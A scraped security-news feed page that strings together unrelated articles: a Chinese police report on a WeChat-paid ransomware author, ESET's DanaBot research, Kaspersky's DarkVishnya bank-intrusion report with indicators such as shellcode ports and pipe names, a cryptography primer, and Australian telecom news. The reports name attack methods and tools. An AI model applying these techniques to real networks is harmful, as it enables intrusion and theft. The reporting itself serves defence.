Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

那个“居然敢微信收款”的勒索病毒制造者已被东莞警方抓获!

$
0
0

摘要: 根据上级公安机关“净网安网2018”专项行动有关部署,近日,东莞网警在省公安厅网警总队的统筹指挥,以及腾讯和360公司的大力协助下,24小时内火速侦破“12.05”特大新型勒索病毒破坏计算机信息系统案,抓获病毒研发制作者1名,缴获木马程序和作案工具一批。该犯...


那个“居然敢微信收款”的勒索病毒制造者已被东莞警方抓获!

根据上级公安机关“净网安网2018”专项行动有关部署,近日,东莞网警在省公安厅网警总队的统筹指挥,以及腾讯和360公司的大力协助下,24小时内火速侦破“12.05”特大新型勒索病毒破坏计算机信息系统案,抓获病毒研发制作者1名,缴获木马程序和作案工具一批。该犯罪嫌疑人涉嫌利用自制病毒木马入侵用户计算机,非法获取淘宝、支付宝、百度网盘、邮箱等各类用户账号、密码数据约5万余条,全网已有超过10万台计算机被感染。该案为国内首宗同类型案件,该案的成功侦破及时阻断了该病毒对全网计算机系统入侵的进一步扩大,有效遏制了病毒进一步传播。

案发经过

近日,一款利用微信二维码支付的新型勒索病毒在互联网传播,群众关注度高,病毒危害造成广泛恶劣影响。

12月4日18时许,东莞网警支队接省公安厅网警总队通报称,腾讯公司举报,东莞一名男子向多个计算机信息系统传播病毒木马,锁定目标系统文件,利用微信支付勒索钱财后解锁。

获悉省厅网警总队下发线索后,东莞网警快速反应,立即启动网络安全事件应急处置预案,调集骨干警力,对涉案线索开展排查,于12月4日22时准确摸排出嫌疑人真实身份为罗某某(男,22岁,广东茂名人),其主要在我市东坑镇活动。12月5日凌晨,东莞网警联合东坑分局连夜展开抓捕行动,经十小时连续奋战,于15时将嫌疑人罗某某抓获。

经审讯,嫌疑人罗某某对其制作新型勒索病毒破坏计算机信息系统,利用微信支付勒索钱财的事实供认不讳。据其供述,2018年6月,罗某某自主研发出病毒“cheat”,用于盗取他人支付宝的账号密码,进而以转账方式盗取资金。同时制作内含“cheat”木马病毒代码的某开发软件模块,在互联网上发布,任何通过该开发软件编写的应用软件均包含木马病毒代码,代码在后台自动运行,记录用户淘宝、支付宝等账号密码,以及键盘操作,上传至服务器。此外,嫌疑人通过执行命令对感染病毒的计算机除系统文件、执行类文件以外的所有文件进行加密,随后弹出包含解密字样和预置微信收款二维码的勒索界面,解密程序标题显示“你的电脑已被加密,请执行以下操作,扫一扫二维码,你需要支付110进行解密”。

目前,嫌疑人罗某某已被警方依法刑事拘留,案件正在进一步审理中。

东莞网警建议

1、计算机用户应定期对重要数据进行备份;

2、谨慎下载不明来源软件,如论坛,网盘等,安装时建议检查软件签名;

3、受感染用户在清除病毒后还需尽快修改支付宝、百度云、网易163、腾讯QQ、淘宝、天猫和京东等平台的密码

来源:平安东莞

相关文章 心真大!微信收款的勒索病毒制造者还不知道即将吃牢饭了…… 国产“微信支付”勒索病毒爆发 腾讯发布解密工具 没错:昨天,出了个新的勒索病毒,居然要求微信支付了! 阿拉斯一地区遭黑客攻击后 已付清黑客索要的比特币 时至今日 英国卫生部门还在为WannaCry“擦屁股”


那个“居然敢微信收款”的勒索病毒制造者已被东莞警方抓获!

微信支付勒索病毒制造者已被刑拘:年仅22岁 感染超10万电脑

$
0
0

根据上级公安机关“净网安网2018”专项行动有关部署,近日,东莞网警在省公安厅网警总队的统筹指挥,以及腾讯和360公司的大力协助下,24小时内火速侦破“12.05”特大新型勒索病毒破坏计算机信息系统案,抓获病毒研发制作者1名,缴获木马程序和作案工具一批。该犯罪嫌疑人涉嫌利用自制病毒木马入侵用户计算机,非法获取淘宝、支付宝、百度网盘、邮箱等各类用户账号、密码数据约5万余条,全网已有超过10万台计算机被感染。该案为国内首宗同类型案件,该案的成功侦破及时阻断了该病毒对全网计算机系统入侵的进一步扩大,有效遏制了病毒进一步传播。

案发经过

近日,一款利用微信二维码支付的新型勒索病毒在互联网传播,群众关注度高,病毒危害造成广泛恶劣影响。

12月4日18时许,东莞网警支队接省公安厅网警总队通报称,腾讯公司举报,东莞一名男子向多个计算机信息系统传播病毒木马,锁定目标系统文件,利用微信支付勒索钱财后解锁。

获悉省厅网警总队下发线索后,东莞网警快速反应,立即启动网络安全事件应急处置预案,调集骨干警力,对涉案线索开展排查,于12月4日22时准确摸排出嫌疑人真实身份为罗某某(男,22岁,广东茂名人),其主要在我市东坑镇活动。12月5日凌晨,东莞网警联合东坑分局连夜展开抓捕行动,经十小时连续奋战,于15时将嫌疑人罗某某抓获。


微信支付勒索病毒制造者已被刑拘:年仅22岁 感染超10万电脑

经审讯,嫌疑人罗某某对其制作新型勒索病毒破坏计算机信息系统,利用微信支付勒索钱财的事实供认不讳。据其供述,2018年6月,罗某某自主研发出病毒“cheat”,用于盗取他人支付宝的账号密码,进而以转账方式盗取资金。同时制作内含“cheat”木马病毒代码的某开发软件模块,在互联网上发布,任何通过该开发软件编写的应用软件均包含木马病毒代码,代码在后台自动运行,记录用户淘宝、支付宝等账号密码,以及键盘操作,上传至服务器。此外,嫌疑人通过执行命令对感染病毒的计算机除系统文件、执行类文件以外的所有文件进行加密,随后弹出包含解密字样和预置微信收款二维码的勒索界面,解密程序标题显示“你的电脑已被加密,请执行以下操作,扫一扫二维码,你需要支付110进行解密”。

目前,嫌疑人罗某某已被警方依法刑事拘留,案件正在进一步审理中。

东莞网警建议

1、计算机用户应定期对重要数据进行备份;

2、谨慎下载不明来源软件,如论坛,网盘等,安装时建议检查软件签名;

3、受感染用户在清除病毒后还需尽快修改支付宝、百度云、网易163、腾讯QQ、淘宝、天猫和京东等平台的密码

(原标题为“东莞网警火速侦破“12.05”特大新型勒索病毒破坏计算机信息系统案”)

声明:本文来自平安东莞,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。

Banking Trojan DanaBot Now Uses Signed Email Spam as Propagation Method

$
0
0

The modular Danabot banking Trojan has been again upgraded with email harvesting and sending capabilities after previously receiving 64-bit and RDP support following its target switch on to European targets during September 2018.

As reported by ESET's security research team, the new spam-capableDanabot version can propagate itself via spam emails sent as replies to messages found in mailboxes located on compromised machines running webmail services based on Horde, Roundcube, andOpen-Xchange.

Given its modular structure and the eagerness of its authors to regularly add new plugins, ESET considers that Danabothas already surpassed the initial scope its masters had in mind when coding it.

ESET's analysis also uncovered the fact thatDanabot shares script structure with other malware strains such as BackSwap, Tinba or Zeus, a clear proof of its modularity which allows it to reuse scripts from other malware families quite effortlessly.

Danabot linked to GootKit by downloader module

Additionally, Danabot has been observed while exhibiting dropper behavior, peddling other malware, with a GootKit downloader module being the prime example, hinting at a direct connection between the groups controlling the two malware families.

Although the presence of the banking fraudGootKit Trojan sample on one of DanaBot’s C&C server might seem surprising, ESET also witnessed the Emotet Trojan distributing GootKit during Cyber Monday and Black Friday campaigns.

As mentioned in the beginning,after being upgraded with spam capabilities, Danabotcan now harvest email addresses from mailboxes found on compromised machines and send spam messages as replies to propagate itself to other potential targets.

The more-than-Trojan Danabot will achieve this tas by "injecting a malicious script into the targeted webmail services’ webpages once a victim logs in, processing the victim’s emails and sending all email addresses it finds to a C&C server," according to ESET.

The Trojan is also capable of sending signed spam email

Next, Danabot will use another injected script to start sending spam in the background if it finds one of the webmail services it can control, taking advantage of digital signatures to deliver signed emails to make the spam it peddles look legit.

At the moment, Danabot's masters seem interested in Italian “certified electronic mail” services, which leads to the idea that they "are focused on targeting corporate and public administration emails that are the most likely to use this certification service."

A full list of indicators of compromise and webmail services targeted by Danabot's newemail-address-harvesting feature is available at the end of ESET's extensive report .

DarkVishnya: Banks attacked through direct connection to local network

$
0
0

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot , leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.


DarkVishnya: Banks attacked through direct connection to local network

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

netbook or inexpensive laptop Raspberry Pi computer Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare

MEM:Trojan.Win32.Cometer

MEM:Trojan.Win32.Metasploit

Trojan.Multi.GenAutorunReg

HEUR:Trojan.Multi.Powecod

HEUR:Trojan.Win32.Betabanker.gen

not-a-virus:RemoteAdmin.Win64.WinExe

Trojan.Win32.Powershell

PDM:Trojan.Win32.CmdServ

Trojan.Win32.Agent.smbe

HEUR:Trojan.Multi.Powesta.b

HEUR:Trojan.Multi.Runner.j

not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190

tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444

tcp://10.**.*.**:4445

tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport

\\.\s-pipe

如果当年这样传小纸条,我可能早就有对象了!

$
0
0

最近,微博上有人提出一个话题――聊聊你学生时代收到过的纸条,瞬间激起网友们一波波的回忆杀。

有讲老师坏话的:


如果当年这样传小纸条,我可能早就有对象了!

有问考试答案的:


如果当年这样传小纸条,我可能早就有对象了!

还有偷偷塞情书给暗恋同学的:


如果当年这样传小纸条,我可能早就有对象了!

网友们直呼太有共鸣,纷纷祭出压箱底的小纸条故事:

熹微Z>。焊呷

成为“黑客”前,必学的“密码学原理”

$
0
0

”密码学“是一个高度跨学科的领域,包含纯数学、计算机科学以及电子工程等多方面的知识。 "许多小白看到这里应该头就大了"要学这么多知识才能理解密码学吗?"当然不需要"如果你的理想是成为密码学科学的研究者或者领域专家,一定要掌握上述学科知识。但是对于一名"初学者黑客"我们仅需要了解密码学的常规术语、密码加密、密码分析等密码学基本体系就足够了。

接下来我就以本篇文章给想了解密码学的小伙伴们一点启发和引导!


成为“黑客”前,必学的“密码学原理”
一、 什么是密码学

官方定义:密码学是研究编制密码和破译密码的技术科学。研究密码变化的客观规律,应用于编制密码以保守通信秘密的,称为编码学;应用于破译密码以获取通信情报的,称为破译学,总称密码学。

通俗理解:密码学是隐藏信息的科学和艺术,因此它们是保密的,然后"取消隐藏"它们,以便只有预期的接收者才能阅读它们。基本上,我们可以说密码学是秘密消息传递的科学。

二、 密码学里的常用术语解释
成为“黑客”前,必学的“密码学原理”
消息也成为明文。 加密的消息称为密文。 E(M) = C,E为加密函数,M为明文,C为密文。 D(C) =M,D为解密函数,C为密文,M为明文 。 算法和密钥:如果算法的保密性是基于保持算法的秘密,这叫受限制的算法。任何算法都是可能被人逆向分析的,显然这样是不安全的。现代密码学采用密钥解决这个问题。密钥用K表示,k1称为加密密钥,k2称为解密密钥,如果K1=K2,或者k2能从k1推算出来,反过来也成立,则这样的算法叫对称算法。如果k1不等于k2,并且k1与k2不能互相推导出来,则这样的算法叫做非对称方法,也叫公钥算法。 密码分析:不知道密钥的情况下,回复出明文的科学。 隐写术:将秘密消息隐藏在其它消息中。最常见的就是在图像中隐藏消息,window下用copy命令直接可成功。 三、 密码学的七个重要工具

密码学的七个重要工具分别是:对称密码、公钥密码、单向散列函数、消息认证码、数字签名、证书和伪随机数生成器。

1. 对称密码

对称密码(symmetric cryptography)是指在加密和解密时使用同一密钥的方式。它是最常见的一种加密方式,通过将信息编码,利用公开的加密算法和保密的密钥完成对信息的加密和解密,其中加密过程和解密过程是对称的,因此被称为对称密码。

这里出现了公开的加密算法的概念,人们通常存在一种错误的观点,即保密的加密算法具有更高的安全性,这被现代密码学称之为"隐蔽式安全性"。因为保密的加密算法只要被使用,迟早会公诸于世,想依靠对密码算法本身进行保密来确保机密性的密码系统也就土崩瓦解了。相反,如果加密算法从一开始就没设想过要保密,则它会得到各种攻击的洗礼,从而实现更强的保密性。因此现代密码学的加密方式基本以"公开加密算法+保密密钥"组成。

组成:公开的加密算法+保密的密钥; 加密过程:A向B发送加密信息t时,需要利用加密算法和密钥对t进行加密; 解密过程:加密过程的逆过程; 优点:巨大的密钥空间能够抵御暴力破解、算法上没有弱点可以抵御其他类型的攻击、加解密运算效率高等优点; 缺点:密钥配送问题(这也是必须用到其它密码技术的原因); 常见密码算法:DES、AES等; 用途:加密信息; 2. 公钥密码

公钥密码(public-key cryptography)是指在加密和解密时使用不同密钥的方式,与对称密钥正好相反,因此也被称为非对称密码(asymmetric cryptography)。

组成:公开的加密算法+公开密钥(公钥)+保密密钥(私钥); 加密过程:A向B发送加密信息t时,需要利用加密算法和B的公钥对t进行加密; 解密过程:B需要利用解密算法(通常与加密算法相同)和B的私钥对t进行解密; 优点:解决了密钥配送的问题; 缺点:加解密算法效率低(意味着它无法直接用于信息加密),中间人攻击(B无法确定密文是由A发来的,因此需要引入新的安全技术); 常见密码算法: RSA等; 用途:加密对称密钥等; 3. 单向散列函数

首先说明,后面这几项技术都不是直接用于加密的。单向散列函数(one-way hash function)有一个输入和一个输出,其中输入称为消息,输出称为散列值。它通过一个不可逆的函数y=f(x)将x映射为y,通过对比传输前后y的变化来判断x是否被篡改。举个例子:假设A要传输t给B,并且要能够让B判断传输过程中是否有人修改过t,那怎么做呢?A可以利用单向散列函数,求出y=f(t),并将t和y一起发给B;B得到t和y后,利用f(t)=y1,判断y和y1是否相同,不同则说明传输过程中t或y出现了错误,信息不完整,相同则说明传输过程中t没有被修改过。

组成:单向散列函数; 优点:算法效率高、辨别篡改; 缺点:无法辨别伪装(这就需要新的安全技术来保证); 常见密码算法:MD5、SHA1等; 用途:判断篡改、基于口令的加密、消息认证码、数字签名等; 4. 消息认证码

说到这里,B仍然无法确定与他通信的人是A。那如何认证A就是A呢?本节介绍的消息认证码(message authentication code)是一种确认完整性并进行认证的技术,简称MAC。它的思想很朴素,为了确保完整性,需要MAC与信息内容相关,为了能够认证,可以利用公共密钥来提供。很显然,MAC可以用单向散列函数与密钥的组合来实现,这也是现实中MAC的一种实现方案。

组成:完整性技术(单向散列函数等)+保密密钥; 加密过程:将密钥作为完整性技术的种子引入,从而得到MAC; 认证过程:将信息t做相同的操作,并与传来的MAC对比,辨别伪装; 优点:辨别篡改和伪装; 缺点:存在密钥传递的问题,当然可以引入公钥方案解决,但又会引入中间人攻击的问题(这也是数字签名的作用)。另外也存在无法防止否认的问题; 常见密码算法:HMAC等; 用途:判断篡改、认证; 5. 数字签名

上一节提到了一种认证方案,但在某些场景下还存在诸多不足,如无法防止否认、无法抵御中间人攻击的问题。无法防止否认是因为密钥相同,无法判断谁发出了这条消息,因此将密钥分开为加密密钥和解密密钥就可以解决无法防止否认的问题。这是不是跟公钥密码很相似,可以将数字签名看成是公钥密码的反过程,用私钥加密来生成签名,用公钥解密来验证签名(这也要求不对称加密算法可逆,由此可是RSA多牛逼)。但前文讨论过RSA算法效率不高,因此数字签名的做法通常:单向散列函数+RSA算法。

组成:单向散列函数+公钥密码算法+公钥; 加密过程:A将信息t经过单向散列函数运算得到h,利用A的私钥对h加密得到数字签名s; 认证过程:B收到t和s,利用A的公钥对s进行解密,再将t散列,对比两者是否一致即可。 优点:能够识别篡改和伪装,还可以防止否认; 缺点:由于用到了公钥密码,那仍然无法理想的解决中间人攻击,因此提出了证书的概念; 常见密码算法:RSA等算法组合; 用途:各种需要认证的场景; 6. 证书

通过上面的讲解可以看出,密码学的基础是对称密码+公钥密码,但它们仍然无法抵御中间人攻击,也即M想办法阻断A和B的直接通信,同时伪装成B然后与A通信,伪装成A然后与B通信。这个问题在密码学看来就是个死循环,因此需要引入额外的技术――社会学知识:让公钥以及数字签名技术成为一种社会性的基础设施,即公钥基础设施(public key intrastructure),简称PKI。而证书,就是将公钥当作一条消息,由一个可信的第三方对其签名后所得到的公钥。

7. 伪随机数生成器

前面介绍的几项技术仿佛能保证信息的安全性,但其中仍然存在着坑:密钥的由来以及各种算法参数的由来。很显然,如果它是由特定的序列来生成的,那么攻击者很容易就能推测出密钥。那如何才能让攻击者没法推测出来呢?那就是用随机数。可又出现了一个问题,怎么得到随机数呢?一次次的扔硬币肯定不行,那还是需要一个算法来快速的生成类似随机数的数,这就是伪随机数生成器。因此这个伪随机数生成器的算法还是需要一番功夫的,这里就不再赘述。

四、 现代密码学常见的密码算法 1. 对称算法

对称密码算法有时又叫传统密码算法,就是加密密钥能够从解密密钥中推算出来,反过来也成立。在大多数对称算法中,加密解密密钥是相同的。这些算法也叫秘密密钥算法或单密钥算法,它要求发送者和接收者在安全通信之前,商定一个密钥。对称算法的安全性依赖于密钥,泄漏密钥就意味着任何人都能对消息进行加密解密。只要通信需要保密,密钥就必须保密。

(1) DES:DES算法的入口参数有三个:Key、Data、Mode。其中Key为7个字节共56位,是DES算法的工作密钥;Data为8个字节64位,是要被加密或被解密的数据;Mode为DES的工作方式,有两种:加密或解密。其功能是把输入的64位数据块按位重新组合,并把输出分为L0、R0两部分,每部分各长32位,其置换规则为将输入的第58位换到第一位,第50位换到第2位……依此类推,最后一位是原来的第7位。L0、R0则是换位输出后的两部分,L0是输出的左32位,R0是右32位,例:设置换前的输入值为D1D2D3……D64,则经过初始置换后的结果为:L0=D58D50……D8;R0=D57D49……D7。

经过16次迭代运算后,得到L16、R16,将此作为输入,进行逆置换,逆置换正好是初始置换的逆运算,由此即得到密文输出。

此算法是对称加密算法体系中的代表,在计算机网络系统中广泛使用。

(2) AES:高级加密标准(英语:Advanced Encryption Standard,缩写:AES),在密码学中又称Rijndael加密法,是美国联邦政府采用的一种区块加密标准。这个标准用来替代原先的DES,已经被多方分析且广为全世界所使用。经过五年的甄选流程,高级加密标准由美国国家标准与技术研究院(NIST)于2001年11月26日发布于FIPS PUB 197,并在2002年5月26日成为有效的标准。2006年,高级加密标准已然成为对称密钥加密中最流行的算法之一。

AddRoundKey ― 矩阵中的每一个字节都与该次轮秘钥(round key)做XOR运算;每个子密钥由密钥生成方案产生。 SubBytes ― 通过非线性的替换函数,用查找表的方式把每个字节替换成对应的字节。 ShiftRows ― 将矩阵中的每个横列进行循环式移位。 MixColumns ― 为了充分混合矩阵中各个直行的操作。这个步骤使用线性转换来混合每列的四个字节。 2. 非对称算法

非对称密钥也叫公开密钥加密,它是用两个数学相关的密钥对信息进行编码。在此系统中,其中一个密钥叫公开密钥,可随意发给期望同密钥持有者进行安全通信的人。公开密钥用于对信息加密。第二个密钥是私有密钥,属于密钥持有者,此人要仔细保存私有密钥。密钥持有者用私有密钥对收到的信息进行解密。

(1) RSA:RSA算法基于一个十分简单的数论事实:将两个大质数相乘十分容易,但是想要对其乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥。

因为两个大素数的乘积因式分解时,除了1和其本身(这两个不在分解范围内)外,只有这两个大素数,但是分解时不知道这两个大素数,只有从最小的素数2开始,逐步试除,直到这两个大素数中较小的一个,当然非常困难了。

在公开密钥密码体制中,加密密钥(即公开密钥)PK是公开信息,而解密密钥(即秘密密钥)SK是需要保密的。加密算法E和解密算法D也都是公开的。虽然解密密钥SK是由公开密钥PK决定的,但却不能根据PK计算出SK。

RSA算法是一种非对称密码算法,所谓非对称,就是指该算法需要一对密钥,使用其中一个加密,则需要用另一个才能解密。

RSA的算法涉及三个参数,n、e1、e2。

其中,n是两个大质数p、q的积,n的二进制表示时所占用的位数,就是所谓的密钥长度。 e1和e2是一对相关的值,e1可以任意取,但要求e1与(p-1)*(q-1)互质;再选择e2,要求(e2*e1)mod((p-1)*(q-1))=1。 (n,e1),(n,e2)就是密钥对。其中(n,e1)为公钥,(n,e2)为私钥。

RSA加解密的算法完全相同,设A为明文,B为密文,则:A=B^e2 mod n;B=A^e1 mod n;(公钥加密体制中,一般用公钥加密,私钥解密)

e1和e2可以互换使用,即:

A=B^e1modn;B=A^e2modn; 3. 哈希算法

哈希算法将任意长度的二进制值映射为较短的固定长度的二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计算上是不可能的,所以数据的哈希值可以检验数据的完整性。一般用于快速查找和加密算法。简单解释:哈希(Hash)算法,即散列函数。它是一种单向密码体制,即它是一个从明文到密文的不可逆的映射,只有加密过程,没有解密过程。同时,哈希函数可以将任意长度的输入经过变化以后得到固定长度的输出。哈希函数的这种单向特征和输出数据长度固定的特征使得它可以生成消息或者数据。

(1) MD5:MD5即Message-Digest Algorithm 5(信息-摘要算法5),用于确保信息传输完整一致。是计算机广泛使用的杂凑算法之一(又译摘要算法、哈希算法),主流编程语言普遍已有MD5实现。将数据(如汉字)运算为另一固定长度值,是杂凑算法的基础原理,MD5的前身有MD2、MD3和MD4。

MD5算法具有以下特点:

压缩性:任意长度的数据,算出的MD5值长度都是固定的。 容易计算:从原数据计算出MD5值很容易。 抗修改性:对原数据进行任何改动,哪怕只修改1个字节,所得到的MD5值都有很大区别。 强抗碰撞:已知原数据和其MD5值,想找到一个具有相同MD5值的数据(即伪造数据)是非常困难的。

(2) 2SHA-256:安全哈希算法256位。SHA-1安全性比MD5稍高(160位VS128位),但算法需要时间SHA-1稍慢。

五、 密码分析详解

密码编码学的主要目的是保持明文(或者是密钥)的秘密并防止窃听者(也可以叫对手、攻击者、截取者、入侵者、敌人等)知晓。这里假设窃听者完全能够截获发送者和接收者之间的通信。

密码分析学是在不知道密钥的情况下,恢复明文的科学。成功的密码分析可以恢复消息的明文或者密钥。与此同时,密码分析也可以验证出密码体制的弱点,并最终恢复明文或者密钥。

对密码进行分析的尝试称为攻击(attack)。A.Kerckhoffs 早在19世纪就阐明了密码分析的一个基本假设,此假设就是秘密必须全寓于密钥中。Kerckhoffs假设密码分析者已知密码算法以及其实现的全部资料。虽然在实际的密码分析中并不总是拥有如此详细的信息,但理应如此假设。这样如果不能破译算法,那么即便了解算法是如何工作的也是徒然。当然,如果连算法的知识和相关资料都没有,那就肯定无法破译。

现我列出常用的七类密码分析攻击,在此假设每一类密码分析者都知道所用的加密算法的全部知识。

唯密文攻击(ciphertext-only attack)。密码分析者有一些消息的密文,这些消息都用相同的加密算法进行加密。密码分析者的任务就是恢复尽可能多的明文,或者最好能推算出加密消息的密钥,以便可采用相同的密钥破解其他被加密的消息。 已知明文攻击(known-plaintext attack)。密码分析者不仅可得到一些消息的密文,而且也知道这些消息的明文。分析者的任务就是用加密信息推出用来加密的密钥或导出一个算法,此算法可以对用相同密钥加密的任何新消息进行解密。 选择明文攻击(chosen-plaintext attack)。分析者不仅可以得到一些消息的密文和相同的明文,而且还可以选择被加密的明文。这比已知明文攻击更加有效,因为密码分析者能选择特定的明文块进行加密,那些块可能产生更多关于密钥的信息。分析者的任务就是推导出用来加密消息的密钥或导出一个算法,此算法可以对用相同密钥加密的任何新消息进行解密。 自适应选择明文攻击(adaptive-chosen-plaintext attack)。这是选择明文攻击的特殊情况。密码分析者不仅能够选择被加密的明文,还可以基于以前加密的结果修正这个选择。在选择明文攻击中,密码分析者还可以选择一大块被加密的明文。而在自适应选

Optus says renewal of USO deal ignores reality

$
0
0

Australia's second biggest telco, Singtel Optus, says Wednesday's announcement by the Federal Government about arrangements for the Universal Service Obligation being retained as such does not reflect "real changes in policy, market and technological realities".

The company's vice-president of Regulatory and Public Affairs, Andrew Sheridan, said in a statement: "It is deeply disappointing that after countless reviews recommending wholesale changes to the USO, the government continues with a policy that fails to deliver competition for regional consumers while subsidising Telstra with next to no transparency and accountability of how these funds are being used."

The government announcement said it would continue to use Telstra copper and wireless networks in rural and remote Australia for providing voice services in NBN fixed wireless and satellite areas.

Communications Minister Mitch Fifield claimed this decision would ensure certainty for people, particularly those in remote and rural areas.

Sheridan said every year the government and Telstra's competitors contributed $150 million which allowed the dominant telco "to use their infrastructure to promote their brand across hundreds of metro and regional locations nationally and cross subsidise their services".

Optus had made an offer to divert its annual $50 million contribution to regional and rural telecommunications services, he said. These could include deploying new satellites for 100% coverage.

Sheridan said: "Optus supports the delivery of telecommunications services for all Australians and has invested billions in our mobile network to deliver competition and choice for regional and remote communities.

"Despite standard mobile voice services reaching over 99% of Australian households, there continues to be insufficient recognition of mobile networks as a legitimate provider of voice services.

"Optus calls for the immediate release of the Telstra USO Performance Agreement and the implementation of annual reporting by Telstra to provide taxpayers and industry with transparency and accountability moving forward."

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

WatchGuard beefs up Australia, NZ distributor network

$
0
0

Network security solutions vendor WatchGuard Technologies has expanded its distributor network in Australia and New Zealand with the appointment of Leader Computers and Dicker Data New Zealand.

WatchGuard says the new appointments will enable it to rapidly expand its regional channel reseller footprint and help to accelerate overall business growth to meet the growing demand for network security and intelligence solutions and services among SMB and distributed enterprises.

Mark Sinclair, ANZ Regional Manager, WatchGuard Technologies, said, “We are still growing very rapidly in Australia and New Zealand and want to increase our growth further in 2019. As a 100% channel focused company, the best way to achieve our goals is to appoint more partners and particularly those with a regional presence.

“These two new distributors are a great fit for WatchGuard enabling us to bolster their security portfolio while being able to provide thousands of resellers across both countries with the potential for major new revenue opportunities.

“Adelaide-headquartered Leader Computers has excellent Australian regional coverage among traditionally smaller reseller partners. As a result, the distributor is a perfect match for WatchGuard given that we are designed for SMBs and distributed enterprises. Across the Tasman, Dicker Data New Zealand will be our second distributor in the country and will support our growth among SMBs that are looking for a simple, yet effective security solution. The WatchGuard technology is a great choice for New Zealand business.”

Leader Computers joins Bluechip Infotech, Dicker Data and Exclusive Networks as the WatchGuard’s existing distribution partners in Australia.

Theo Kristoris, Managing Director, Leader Computers, said, “We are a value added distributor with 23 years of experience in helping resellers grow and become more profitable. WatchGuard is an industry leading security solution with support that is second to none in the industry and a market offering that presents our reseller community with major sales opportunities. We look forward to focusing our security business on WatchGuard and will invest in training and certification so that we can best support our resellers moving forward.”

Leader Computers has warehousing and support in all five mainland capital cities and will have 45 account managers as well as a team of pre- and post-sales engineers trained on WatchGuard solutions.

And in addition, WatchGuard will support Leader Computers with outbound marketing and participation in the distributor’s annual national expo next March at which around 5,000 resellers will be in attendance.

Dicker Data New Zealand will complement Exeed, WatchGuard’s current distributor in New Zealand.

Lisa Tierney, General Manager Enterprise Dicker Data NZ, said, “Security is such an important part of IT and WatchGuard is a great solution set for our resellers completing a gap in our mid-market portfolio. At the same time, WatchGuard is a well-known and trusted brand in New Zealand.

“We will now focus on aligning WatchGuard with our resellers’ business, provide hands-on training and enable partners so that we can get them focused on WatchGuard as both a simple to sell and deploy solution. We are excited about the overall market opportunity which WatchGuard present to our business.”

In addition to providing sales training, certification programs and marketing resources. WatchGuard will provide Leader Computers and Dicker Data with access to the WatchGuard Learning Centre, an advanced learning management system which delivers personalised educational paths in sales readiness, channel enablement, and technical training through a web-based learning environment.

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

